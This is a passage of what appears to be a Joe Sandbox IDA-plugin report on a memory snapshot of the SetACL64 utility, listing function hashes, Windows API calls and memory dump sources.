                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                                        • Instruction ID: 97cab12895228fb44d477477ac194cf0582216144f7e1b0b87bfac3839b0d34e
                                        • Opcode Fuzzy Hash: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                                        • Instruction Fuzzy Hash: 0CF090D0B19207C2FF6657A698153B502A17F88B84F4C513CC90EC67D1ED6EEC81C272
                                        APIs
                                        • HeapAlloc.KERNEL32(?,?,?,00007FF68687BCE1,?,?,00000000,00007FF68687D70B,?,?,?,00007FF6868734C7,?,?,?,00007FF6868733BD), ref: 00007FF6868750D2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
                                        • Instruction ID: 775769313d7560ac7fc501f500eafdddfeb87613615633c595624100f7eb1872
                                        • Opcode Fuzzy Hash: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
                                        • Instruction Fuzzy Hash: D0F08290B0D307C6FF256762580527411A17F447A8F188338DD2EC62C6DD2EEC81C272
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                        • API String ID: 667068680-295688737
                                        • Opcode ID: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
                                        • Instruction ID: ee9084e28ac85c2e3acb28ef800b89558ed5a967146dff3a1102d302851784cb
                                        • Opcode Fuzzy Hash: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
                                        • Instruction Fuzzy Hash: F5A1A0E0E89B0BD5EA249F55FC4512423A6BF88785F844039C84ED7335EE7EE889C320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AllocString$DescriptorSecurityValid_invalid_parameter_noinfo_noreturn
                                        • String ID: GetSD$SetSD$__systemsecurity$__systemsecurity=@$t5x$$x$2z$w
                                        • API String ID: 1218313072-3940533286
                                        • Opcode ID: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
                                        • Instruction ID: ba59e4822b8f7e0d739b1f9ad255a7081441f27c13268fab4cf684876211e9fb
                                        • Opcode Fuzzy Hash: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
                                        • Instruction Fuzzy Hash: C2F148B2A09B46C6EB14DF65E49836963A4FF88B84F044539DA4E83794DF3EE854C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                        • String ID: failed with: $ the privilege $Enabling$SetPrivilege
                                        • API String ID: 152255395-1151176482
                                        • Opcode ID: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
                                        • Instruction ID: c994697dadc82ef0e5c6273f79f15f31f67f46c5af6bb4a3791a1a7547b2fd98
                                        • Opcode Fuzzy Hash: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
                                        • Instruction Fuzzy Hash: 75D191A2B18B46C5FB008B65D5893AD2361FF857A8F504239DB5D97AE9DF3DE880C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: FreeLibraryString$ByteLoad$AllocErrorFormatLastLocalMessage_invalid_parameter_noinfo_noreturn
                                        • String ID: netmsg.dll$pdh.dll
                                        • API String ID: 40273658-131213443
                                        • Opcode ID: 509bcff9dc41729db223f1edf4d17637db7f3b14702afe9ed8d969c13de03bd2
                                        • Instruction ID: 04136fc9a9407f5c55d33a64320f1109f2c662dc5bb357685144d01604869850
                                        • Opcode Fuzzy Hash: 509bcff9dc41729db223f1edf4d17637db7f3b14702afe9ed8d969c13de03bd2
                                        • Instruction Fuzzy Hash: DEB1D2B2A08746C6EB108B15E9443AE33A1FF44BA8F504639DA5D87BE4DF3EE841C750
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: DescriptorSecurity$ErrorLastMakeRelativeSelf$DaclGroupOwnerSacl_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 3822310168-0
                                        • Opcode ID: 1a143b5dc0866976304182db4d08a821830a9c3d75e33f02e80d987c8124c854
                                        • Instruction ID: 6ed027d63a938547275d5e075d188594240d612477da603a5610b0b01c290ded
                                        • Opcode Fuzzy Hash: 1a143b5dc0866976304182db4d08a821830a9c3d75e33f02e80d987c8124c854
                                        • Instruction Fuzzy Hash: 3F515BE2A19A52C5FB14DF61D8593792361BF80B84F44403ACB6E8B6A5DF2EEC51C360
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                        • String ID:
                                        • API String ID: 3939093798-0
                                        • Opcode ID: c1a13ead2e16a132016a420d339e8d407b4230b911f8cc16b805d80e8827ded2
                                        • Instruction ID: 1d3b5c8ac1dca7daee6ef65360d98367d3b4a3d70d3eb90fea62f5fa90e3d57f
                                        • Opcode Fuzzy Hash: c1a13ead2e16a132016a420d339e8d407b4230b911f8cc16b805d80e8827ded2
                                        • Instruction Fuzzy Hash: 8D714BA2F09656CAFB109B64D8506B923B0BF48B84F444139CF1D97795EF3EAC45C760
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 3140674995-0
                                        • Opcode ID: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
                                        • Instruction ID: 8ff20698835a8c6f7262d9185f252a790125d09e07a7b596757fc9f8cb0dee2a
                                        • Opcode Fuzzy Hash: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
                                        • Instruction Fuzzy Hash: F4313CB2618B86CAEB609F60E8543EE6365FB84744F44403ADB4D87B99DF3DD948C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                                        • Instruction ID: 678695c2bb4fff7f16deece579002792e3f0b85fb940d855dec450c5c7193d32
                                        • Opcode Fuzzy Hash: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                                        • Instruction Fuzzy Hash: 52A1E6A2B18685C5EA60CB2694047BAA3B0FF94BD4F54413AEE5D87B94DF3ED845C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                        • String ID:
                                        • API String ID: 1239891234-0
                                        • Opcode ID: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
                                        • Instruction ID: 0519872dc2e542c435bd10d72e65dccfe74f569aa60f8bf346e66bc1817e7c3c
                                        • Opcode Fuzzy Hash: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
                                        • Instruction Fuzzy Hash: D2316072618B81C6DB608B25E8442AE73A4FF88754F540139EB8D87B65EF3DD945C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastWrite$Console
                                        • String ID:
                                        • API String ID: 786612050-0
                                        • Opcode ID: 595654060b954cd898e70031aa38deb9f7488c276e60d446b525d1db4710fac2
                                        • Instruction ID: ff7280bfbe60e71b4dff526b95f8117112dbe8bc9b391f59b8a4e78f516cb713
                                        • Opcode Fuzzy Hash: 595654060b954cd898e70031aa38deb9f7488c276e60d446b525d1db4710fac2
                                        • Instruction Fuzzy Hash: EED1E0B2B08A81CAE710CF65E4881ED77B1FB45798F14413ADE4E87B99DE3AD419C310
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
                                        • Instruction ID: e5a623606f543a1cbf02e189caeeeb163fd3f54282a995fa222b6af2c775d156
                                        • Opcode Fuzzy Hash: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
                                        • Instruction Fuzzy Hash: 4EB1C0B2A18B41C1EB109B25E44936E63A1FF48BD8F404139DB8D87B99DF7EE990C750
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Resource$FindFreeLoadLockQueryValue_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 678723381-0
                                        • Opcode ID: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                                        • Instruction ID: 7ba90ef05a520d13f77c55ab4759998f6c38476586eb46ada0c00af0494d935f
                                        • Opcode Fuzzy Hash: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                                        • Instruction Fuzzy Hash: 34419062A19B85C1EA108B24E64536A6361FF85BE4F144238EB9D46AAADF3DF580C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: InfoLocaletry_get_function
                                        • String ID: GetLocaleInfoEx
                                        • API String ID: 2200034068-2904428671
                                        • Opcode ID: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
                                        • Instruction ID: 511a789b08861e2b8fbc949cae8397253d3dcc6b5e63fc27b615a04b9f34a030
                                        • Opcode Fuzzy Hash: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
                                        • Instruction Fuzzy Hash: 6B01D1A0B08B42C6E7008B22B9404AAA371BF94BD0F58403ADF5C83B6ACF3DDD41C760
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3644580040-0
                                        • Opcode ID: 625abfe8784ef31295fdbe92046a34f272b46dfe68fa632f601a46611a6647d6
                                        • Instruction ID: e4c8ba9832462bcca2d93dfbe98cd623b7fccbfa770d902293f0157f23ff1622
                                        • Opcode Fuzzy Hash: 625abfe8784ef31295fdbe92046a34f272b46dfe68fa632f601a46611a6647d6
                                        • Instruction Fuzzy Hash: E7617BB2B19642CAEB248F15E54167963B1FF88B40F448139DBAED3691DE3EED50C720
                                        APIs
                                          • Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
                                          • Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11
                                        • GetLocaleInfoW.KERNEL32 ref: 00007FF6868773A8
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$InfoLocale
                                        • String ID:
                                        • API String ID: 3736152602-0
                                        • Opcode ID: 95196c644f9699b70877d59c2ca76c71c45bc80ef89ac16a2cac59d7183ffe7d
                                        • Instruction ID: 7e44a9fcefe949e3f3e7ae3111fefcf467d6aa2bfa6cda0a3344dc7fdee9bc99
                                        • Opcode Fuzzy Hash: 95196c644f9699b70877d59c2ca76c71c45bc80ef89ac16a2cac59d7183ffe7d
                                        • Instruction Fuzzy Hash: AB318BB2B09682C6EB249B25E4413BA62B1FF88784F408039DB5DC3695DE3EEC10C710
                                        APIs
                                          • Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
                                          • Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11
                                        • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF686877777,?,00000000,00000092,?,?,00000000,?,00007FF68686966D), ref: 00007FF68687702A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2417226690-0
                                        • Opcode ID: 85ba5fa5f454a5613c73245898a5c2bac5f412ef3db99b679915ad1f55d47ee7
                                        • Instruction ID: 09fb33b9b7d71c7a90a6f8c77eee092e55df1b3708fe8840dc0698a03e00cd18
                                        • Opcode Fuzzy Hash: 85ba5fa5f454a5613c73245898a5c2bac5f412ef3db99b679915ad1f55d47ee7
                                        • Instruction Fuzzy Hash: EF11DFA3B08645CAEB148F29D0406AC7BB1FF90BA0F448139DA2D833C4DE6ADED1C750
                                        APIs
                                          • Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
                                          • Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11
                                        • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6868772F1), ref: 00007FF68687757F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$InfoLocale
                                        • String ID:
                                        • API String ID: 3736152602-0
                                        • Opcode ID: 49da2eb39f98338b10d953fea960edfff0511e9b01e2e80171c98adcd5d1bcf9
                                        • Instruction ID: 7eee0ab41360a8daa5f8ecec8c42408a5a794d04d5e910aaf62f8d230a25ee8e
                                        • Opcode Fuzzy Hash: 49da2eb39f98338b10d953fea960edfff0511e9b01e2e80171c98adcd5d1bcf9
                                        • Instruction Fuzzy Hash: 3B1106B2B1D696C2EB649B12B04167A23B1FF40B64F105239EB2D876C4DE3AEC81C750
                                        APIs
                                          • Part of subcall function 00007FF686873E64: GetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873E73
                                          • Part of subcall function 00007FF686873E64: SetLastError.KERNEL32(?,?,?,00007FF6868699DD), ref: 00007FF686873F11
